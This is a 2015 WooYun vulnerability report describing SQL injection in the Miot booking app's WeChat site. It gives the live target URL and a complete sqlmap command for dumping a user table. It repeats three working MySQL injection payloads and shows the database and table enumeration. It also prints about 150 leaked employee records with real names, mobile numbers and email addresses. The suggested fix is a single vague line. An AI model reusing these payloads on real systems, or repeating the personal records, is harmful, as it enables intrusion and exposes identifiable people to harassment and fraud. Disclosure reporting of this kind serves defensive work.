当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0152457

漏洞标题:米途APP某处存在SQL注入漏洞(泄露大量用户的真实姓名,邮箱地址及电话号码)

相关厂商:北京米天下科技有限公司

漏洞作者: 路人甲

提交时间:2015-11-07 13:58

修复时间:2015-12-22 13:58

公开时间:2015-12-22 13:58

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-07: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-22: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

米途APP是北京米天下科技有限公司旗下产品之一,是一款充满人情味的线上订房平台,至今共入驻近4000家客栈等特色住宿。

详细说明:

地址:http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0

python sqlmap.py -u "http://wx.miot.cn/i-21898?from=timeline&innid=21898&isappinstalled=0" --random-agent -p innid --technique=BET --batch -D weikezhan -T qy_users -C id,mobile,nickname,email,qyuserid --dump --threads=10

漏洞证明:

---
Parameter: innid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0
---
back-end DBMS: MySQL 5.0
current user:    'weikezhan@%'
current user is DBA:    False
database management system users [1]:
[*] 'weikezhan'@'%'


back-end DBMS: MySQL 5.0
available databases [3]:
[*] information_schema
[*] test
[*] weikezhan
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: innid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0
---
back-end DBMS: MySQL 5.0
Database: weikezhan
[35 tables]
+-------------------+
| cashier_notifies  |
| cashier_oneqr     |
| cashier_partners  |
| cashier_pays      |
| cashier_qrcodes   |
| cashier_slips     |
| qy_user_actions   |
| qy_users          |
| wkz_like          |
| wx_batch_bills    |
| wx_batches        |
| wx_bills          |
| wx_inns           |
| wx_like           |
| wx_log            |
| wx_mailqueue      |
| wx_messages       |
| wx_order_notifies |
| wx_orderremark    |
| wx_orders         |
| wx_pays           |
| wx_pv_histories   |
| wx_pvs            |
| wx_qrcodes        |
| wx_refunds        |
| wx_scan_history   |
| wx_session        |
| wx_smsmt          |
| wx_systemlogs     |
| wx_templatemsgs   |
| wx_tousu          |
| wx_users          |
| wx_users_vv       |
| wx_warns          |
| yzg_push          |
+-------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: innid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0
---
back-end DBMS: MySQL 5.0
Database: weikezhan
Table: wx_users
[16 columns]
+----------------+------------------+
| Column         | Type             |
+----------------+------------------+
| language       | varchar(20)      |
| avatarurl      | varchar(256)     |
| city           | varchar(32)      |
| country        | varchar(32)      |
| firstfollowon  | datetime         |
| followstatus   | smallint(4)      |
| id             | int(11) unsigned |
| lastfollowon   | datetime         |
| lastsyncon     | datetime         |
| lastunfollowon | datetime         |
| nickname       | varchar(32)      |
| openid         | varchar(32)      |
| province       | varchar(32)      |
| sex            | smallint(4)      |
| subscribetime  | int(11)          |
| userfrom       | varchar(10)      |
+----------------+------------------+


Database: weikezhan
Table: qy_users
[10 columns]
+---------------+------------------+
| Column        | Type             |
+---------------+------------------+
| avatarurl     | varchar(256)     |
| email         | varchar(128)     |
| extattr       | varchar(256)     |
| firstfollowon | datetime         |
| followstatus  | smallint(4)      |
| id            | int(11) unsigned |
| mobile        | varchar(16)      |
| nickname      | varchar(32)      |
| openid        | varchar(32)      |
| qyuserid      | varchar(32)      |
+---------------+------------------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: innid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0
---
back-end DBMS: MySQL 5.0
Database: weikezhan
+----------+---------+
| Table    | Entries |
+----------+---------+
| qy_users | 158     |
+----------+---------+
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: innid (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: from=timeline&innid=21898' AND 6804=6804 AND 'lpaQ'='lpaQ&isappinstalled=0
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: from=timeline&innid=21898' AND (SELECT 2256 FROM(SELECT COUNT(*),CONCAT(0x716b767a71,(SELECT (ELT(2256=2256,1))),0x7170767871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'cdXh'='cdXh&isappinstalled=0
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind (SELECT)
    Payload: from=timeline&innid=21898' OR (SELECT * FROM (SELECT(SLEEP(5)))yzKF) AND 'cQQF'='cQQF&isappinstalled=0
---
back-end DBMS: MySQL 5.0
Database: weikezhan
Table: qy_users
[158 entries]
+------+-------------+----------+-------------------------+-------------------------+
| id   | mobile      | nickname | email                   | qyuserid                |
+------+-------------+----------+-------------------------+-------------------------+
| 876  | 13641116360 | 刘超       | liuchao@miot.cn         | liuchao@miot.cn         |
| 877  | 18611586810 | 耿培江      | peter.geng@miot.cn      | peter.geng@miot.cn      |
| 878  | 13529926101 | 陈晓玲      | chenxl@miot.cn          | chenxl@miot.cn          |
| 879  | 15273725707 | 谢妹灵      | xieml@miot.cn           | xieml@miot.cn           |
| 880  | 18200120296 | 陈秀       | chenxiu@miot.cn         | chenxiu@miot.cn         |
| 881  | 18306420667 | 钱文凯      | qianwk@miot.cn          | qianwk@miot.cn          |
| 882  | 18782249534 | 邹莉       | zouli@miot.cn           | zouli@miot.cn           |
| 883  | 15881052405 | 陶敏       | taomin@miot.cn          | taomin@miot.cn          |
| 884  | 18215606651 | 王秋月      | wangqy@miot.cn          | wangqy@miot.cn          |
| 885  | 18629667052 | 王磊       | wanglei@miot.cn         | wanglei@miot.cn         |
| 886  | 18215600309 | 黄熙       | huangxi@miot.cn         | huangxi@miot.cn         |
| 887  | 18787637810 | 黄文诗      | huangws@miot.cn         | huangws@miot.cn         |
| 888  | 18887891568 | 邓正秋      | dengzq@miot.cn          | dengzq@miot.cn          |
| 889  | 18963989645 | 曹丹       | caodan@miot.cn          | caodan@miot.cn          |
| 890  | 13554677029 | 徐春霞      | xucx@miot.cn            | xucx@miot.cn            |
| 891  | 18213103845 | 毛维才      | maowc@miot.cn           | maowc@miot.cn           |
| 892  | 18782950357 | 陈仕怡      | chensy@miot.cn          | chensy@miot.cn          |
| 893  | 15577223377 | 张云       | zhangyun@miot.cn        | zhangyun@miot.cn        |
| 894  | 18230507224 | 殷凤       | yinfeng@miot.cn         | yinfeng@miot.cn         |
| 895  | 18200279722 | 杨岩岩      | yangyy@miot.cn          | yangyy@miot.cn          |
| 896  | 18200273898 | 胡益民      | huym@miot.cn            | huym@miot.cn            |
| 897  | 18610632654 | 林薛       | linxue@miot.cn          | linxue@miot.cn          |
| 898  | 13560492524 | 李舒婷      | list@miot.cn            | list@miot.cn            |
| 899  | 18354280596 | 杨宗敏      | yangzm@miot.cn          | yangzm@miot.cn          |
| 900  | 18363671268 | 谭雪       | tanxue@miot.cn          | tanxue@miot.cn          |
| 901  | 13647735778 | 陆莹       | luying@miot.cn          | luying@miot.cn          |
| 902  | 18908621307 | 原捷       | yuanjie@miot.cn         | yuanjie@miot.cn         |
| 903  | 15273725600 | 龙丹       | longdan@miot.cn         | longdan@miot.cn         |
| 904  | 18780035561 | 江艺梅      | jiangym@miot.cn         | Jiangym@miot.cn         |
| 905  | 13554445953 | 彭梦迪      | pengmd@miot.cn          | pengmd@miot.cn          |
| 906  | 18520756091 | 赵炎宁      | zhaoyn@miot.cn          | zhaoyn@miot.cn          |
| 907  | 13481386606 | 孙佳恒      | sunjh@miot.cn           | sunjh@miot.cn           |
| 908  | 13808204023 | 黄露       | huanglu@miot.cn         | huanglu@miot.cn         |
| 909  | 15198650509 | 钱茜       | qianxi@miot.cn          | qianxi@miot.cn          |
| 910  | 13599278271 | 丁猛猛      | dingmm@miot.cn          | dingmm@miot.cn          |
| 911  | 18687990412 | 姚晴文      | yaoqw@miot.cn           | yaoqw@miot.cn           |
| 912  | 18215561331 | 任欣雨      | renxy@miot.cn           | renxy@miot.cn           |
| 913  | 18388821643 | 徐辰辰      | xucc@miot.cn            | xucc@miot.cn            |
| 914  | 15607108183 | 黄伟强      | huangwq@miot.cn         | huangwq@miot.cn         |
| 915  | 18501232514 | 刘建勋      | liujx@miot.cn           | liujx@miot.cn           |
| 916  | 13170411981 | 马伟       | mawei@miot.cn           | mawei@miot.cn           |
| 917  | 15878393705 | 代颖       | daiying@miot.cn         | daiying@miot.cn         |
| 918  | 18687950608 | 许传阳      | xucy@miot.cn            | xucy@miot.cn            |
| 919  | 18782949786 | 赵阳       | zhaoyang@miot.cn        | zhaoyang@miot.cn        |
| 920  | 18931867639 | 褚晓璇      | chuxx@miot.cn           | chuxx@miot.cn           |
| 921  | 15977382584 | 李春       | lichun@miot.cn          | lichun@miot.cn          |
| 922  | 18650165205 | 刘帅超      | liusc@miot.cn           | liusc@miot.cn           |
| 923  | 18608721662 | 万仕昆      | wansk@miot.cn           | wansk@miot.cn           |
| 924  | 13129957498 | 肖慧泉      | xiaohq@miot.cn          | xiaohq@miot.cn          |
| 925  | 18787639461 | 马敏       | mamin@miot.cn           | mamin@miot.cn           |
| 926  | 18087598788 | 钱韦菡      | qianwh@miot.cn          | qianwh@miot.cn          |
| 927  | 13210232210 | 孙吉强      | sunjq@miot.cn           | sunjq@miot.cn           |
| 928  | 13145439193 | 杨春晓      | yangcx@miot.cn          | yangcx@miot.cn          |
| 929  | 18608020947 | 张思超      | zhangsc@miot.cn         | zhangsc@miot.cn         |
| 930  | 15910826279 | 闫福宽      | yanfk@miot.cn           | yanfk@miot.cn           |
| 931  | 18200116261 | 任青青      | renqq@miot.cn           | renqq@miot.cn           |
| 932  | 18687991808 | 田野       | tianye@miot.cn          | tianye@miot.cn          |
| 933  | 18573414977 | 曹宇       | caoyu@miot.cn           | caoyu@miot.cn           |
| 934  | 13476269336 | 李新       | lixin_bd@miot.cn        | lixin_bd@miot.cn        |
| 935  | 18108087118 | 王莉平      | wanglp@miot.cn          | wanglp@miot.cn          |
| 936  | 15266223978 | 孙兵兵      | sunbb@miot.cn           | sunbb@miot.cn           |
| 937  | 18289531510 | 党鹏辉      | dangph@miot.cn          | dangph@miot.cn          |
| 938  | 18515666418 | 聂源莹      | nieyy@miot.cn           | nieyy@miot.cn           |
| 939  | 15693889008 | 杨霄       | yangxiao@miot.cn        | yangxiao@miot.cn        |
| 940  | 18290025006 | 肖桢       | xiaozhen@miot.cn        | xiaozhen@miot.cn        |
| 941  | 13751725334 | 张晓文      | zhangxw@miot.cn         | zhangxw@miot.cn         |
| 942  | 0976659575  | 楊佳蓉      | yangjr@miot.cn          | yangjr@miot.cn          |
| 943  | 18707738834 | 杨昕妮      | candy.yang@miot.cn      | candy.yang@miot.cn      |
| 944  | 18707738451 | 王重阳      | wangcy@miot.cn          | wangcy@miot.cn          |
| 945  | 15607737287 | 张金荣      | zhangjr@miot.com        | zhangjr@miot.com        |
| 946  | 18354225528 | 李娟       | lijuan@miot.cn          | lijuan@miot.cn          |
| 947  | 18618266362 | 廉伟       | kevin.lian@miot.cn      | kevin.lian@miot.cn      |
| 948  | 18623377663 | 韩华越      | hanhy@miot.cn           | hanhy@miot.cn           |
| 949  | 18687996650 | 罗欣琳      | luoxl@miot.cn           | luoxl@miot.cn           |
| 950  | 18513287139 | 张现会      | xianhui.zhang@miot.cn   | xianhui.zhang@miot.cn   |
| 951  | 15610053723 | 李浩       | lihao@miot.cn           | lihao@miot.cn           |
| 952  | 13012949321 | 刘恩泽      | liuez@miot.cn           | liuez@miot.cn           |
| 953  | 15230650300 | 孙延琦      | yanqi.sun@miot.cn       | yanqi.sun@miot.cn       |
| 954  | <blank>     | <blank>  | <blank>                 | <blank>                 |
| 955  | 13811282421 | 张晓铮      | xiaozheng.zhang@miot.cn | xiaozheng.zhang@miot.cn |
| 956  | <blank>     | <blank>  | <blank>                 | <blank>                 |
| 957  | 18501307720 | 赖洪波      | laihb@miot.cn           | laihb@miot.cn           |
| 958  | 18611672157 | 栾丽丽      | lylian@miot.cn          | lylian@miot.cn          |
| 959  | 17708121889 | 何洋       | heyang@miot.cn          | heyang@miot.cn          |
| 960  | <blank>     | <blank>  | <blank>                 | <blank>                 |
| 961  | 15878356277 | 陈小禹      | chenxy@miot.cn          | chenxy@miot.cn          |
| 962  | 13688311396 | 罗杰       | luojie@miot.cn          | luojie@miot.cn          |
| 963  | 18200120655 | 向祯       | xiangzhen@miot.cn       | xiangzhen@miot.cn       |
| 964  | 13548199265 | 罗婷       | luoting@miot.cn         | luoting@miot.cn         |
| 965  | 18954221221 | 李克宝      | likb@miot.cn            | likb@miot.cn            |
| 966  | 930171920   | 蔡怡庭      | caiyt@miot.cn           | caiyt@miot.cn           |
| 967  | 920737958   | 陳柏霖      | chenbl@miot.cn          | chenbl@miot.cn          |
| 968  | <blank>     | <blank>  | <blank>                 | <blank>                 |
| 969  | <blank>     | <blank>  | <blank>                 | <blank>                 |
| 970  | 18680309769 | 李伟       | eric.li@miot.cn         | eric.li@miot.cn         |
| 971  | 15810905235 | 刘钊       | zhao.liu@miot.cn        | zhao.liu@miot.cn        |
| 972  | 13901179861 | 卢怀宇      | fly.lu@miot.cn          | fly.lu@miot.cn          |
| 973  | <blank>     | <blank>  | <blank>                 | <blank>                 |
| 974  | 15811140634 | 李扬       | liyang@miot.cn          | liyang@miot.cn          |
| 975  | 18601254937 | 火龙       | free.deng@miot.cn       | free.deng@miot.cn       |
| 976  | 18359141466 | 刘秋灵      | liuql@miot.cn           | liuql@miot.cn           |
| 977  | 13331609610 | 林纯       | linchun@miot.cn         | linchun@miot.cn         |
| 978  | 18660016101 | 王小家      | wangxj@miot.cn          | wangxj@miot.cn          |
| 979  | 13523525700 | 李佩轩      | lipx@miot.cn            | lipx@miot.cn            |
| 980  | 13070879659 | 肖慧       | xiaohui@miot.cn         | xiaohui@miot.cn         |
| 981  | 15292085915 | 李翔       | lixiang@miot.cn         | lixiang@miot.cn         |
| 982  | 18816937896 | 舒凡思      | shufs@miot.cn           | shufs@miot.cn           |
| 983  | 0982729792  | 黃玉萍      | huangyp@miot.cn         | huangyp@miot.cn         |
| 984  | 18602130755 | 方敏       | raymond.fang@miot.cn    | raymond.fang@miot.cn    |
| 985  | 18565862889 | 夏跃女      | xiayn@miot.cn           | xiayn@miot.cn           |
| 986  | 13359245975 | 梁茜       | liangqian@miot.cn       | liangqian@miot.cn       |
| 987  | 18234088207 | 孙琳       | sunlin@miot.cn          | sunlin@miot.cn          |
| 988  | 18235139762 | 翟敏飞      | zhaimf@miot.cn          | zhaimf@miot.cn          |
| 989  | 13554681806 | 殷志鹏      | yinzp@miot.cn           | yinzp@miot.cn           |
| 990  | 18963988442 | 王宇轩      | wangyx@miot.cn          | wangyx@miot.cn          |
| 991  | 13986141568 | 裴蕾       | peilei@miot.cn          | peilei@miot.cn          |
| 992  | 13554250605 | 周艺伟      | zhouyw@miot.cn          | zhouyw@miot.cn          |
| 993  | 13554358674 | 杨羽寒      | yangyh.@miot.com        | yangyh.@miot.com        |
| 994  | 18354287358 | 邓楠       | dengnan@miot.cn         | dengnan@miot.cn         |
| 995  | 18671632928 | 吴永利      | wuyl@miot.cn            | wuyl@miot.cn            |
| 996  | 15129823419 | 曹楠       | caonan@miot.cn          | caonan@miot.cn          |
| 997  | 13163271522 | 程佳丽      | chengjl@miot.cn         | chengjl@miot.cn         |
| 998  | 18354298152 | 魏靖       | weijing@miot.cn         | weijing@miot.cn         |
| 999  | 15158112156 | 陈奕冰      | chenyb@miot.cn          | chenyb@miot.cn          |
| 1000 | 18086507227 | 黄晓琴      | huangxq@miot.cn         | huangxq@miot.cn         |
| 1001 | 18681337617 | 滑燕莲      | huayl@miot.cn           | huayl@miot.cn           |
| 1002 | 15527373536 | 文长佳      | wencj@miot.cn           | wencj@miot.cn           |
| 1003 | 18627782095 | 姚翔       | yaoxiang@miot.cn        | yaoxiang@miot.cn        |
| 1004 | 18963993543 | 何盼盼      | hepp@miot.cn            | hepp@miot.cn            |
| 1005 | 18710840785 | 陈静       | chenjing@miot.cn        | chenjing@miot.cn        |
| 1006 | 18798004578 | 刘科廷      | liukt@miot.cn           | liukt@miot.cn           |
| 1007 | 18883868582 | 陈玲       | chenling@miot.cn        | chenling@miot.cn        |
| 1008 | 13458672709 | 杨阳       | yangyang@miot.cn        | yangyang@miot.cn        |
| 1009 | 15827269951 | 代妙妮      | daimn@miot.cn           | daimn@miot.cn           |
| 1010 | 18963995740 | 涂加文      | tujw@miot.cn            | tujw@miot.cn            |
| 1011 | 18289769162 | 宗新程      | zongxc@miot.cn          | zongxc@miot.cn          |
| 1012 | 18850165897 | 武俊杰      | wujj@miot.cn            | wujj@miot.cn            |
| 1013 | 18065745849 | 谢立颖      | xiely@miot.cn           | xiely@miot.cn           |
| 1014 | 18159244573 | 何宝       | hebao@miot.cn           | hebao@miot.cn           |
| 1015 | 15501968015 | 王静       | wangjing@miot.cn        | wangjing@miot.cn        |
| 1016 | 18910387235 | 刘文娟      | wenjuan.liu@miot.cn     | wenjuan.liu@miot.cn     |
| 1017 | 18907578440 | 穆倩男      | muqn@miot.cn            | muqn@miot.cn            |
| 1018 | <blank>     | 邱艺轩      | qiuyixuan@miot.cn       | qiuyixuan@miot.cn       |
| 1019 | 13216169656 | 郑攀峰      | zhengpf@miot.cn         | zhengpf@miot.cn         |
| 1020 | 18570500716 | 韩宇       | hanyu@miot.cn           | hanyu@miot.cn           |
| 1021 | 18290169294 | 钟皓程      | zhonghc@miot.cn         | zhonghc@miot.cn         |
| 1022 | 17706519770 | 曾怡昕      | <blank>                 | zengyx@miot.cn          |
| 1023 | 13096383591 | 周勇       | zhouyong@miot.cn        | zhouyong@miot.cn        |
| 1024 | 18234127193 | 邢军       | xingjun@miot.cn         | xingjun@miot.cn         |
| 1025 | 13678089469 | 王斯蕙      | wangsh@miot.cn          | wangsh@miot.cn          |
| 1026 | 15527104425 | 邱月       | qiuyue@miot.cn          | qiuyue@miot.cn          |
| 1027 | 18200293717 | 陈彦伶      | chenyl@miot.cn          | chenyl@miot.cn          |
| 1028 | 18392059876 | 王一珍      | wangyz@miot.cn          | wangyz@miot.cn          |
| 1029 | 17608136880 | 王逸冉      | wangyr@miot.cn          | wangyr@miot.cn          |
| 1030 | 13630287953 | 弓茹月      | gongry@miot.cn          | gongry@miot.cn          |
| 1031 | 18600206604 | 焦玉龙      | bruce.jiao@miot.cn      | bruce.jiao@miot.cn      |
| 1032 | 18681654205 | 陈祥       | chenxiang@miot.cn       | chenxiang@miot.cn       |
| 1033 | 15011395180 | 李逸伦      | liyl@miot.cn            | liyl@miot.cn            |
+------+-------------+----------+-------------------------+-------------------------+

修复方案:

过滤一下。

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)

漏洞评价:

评论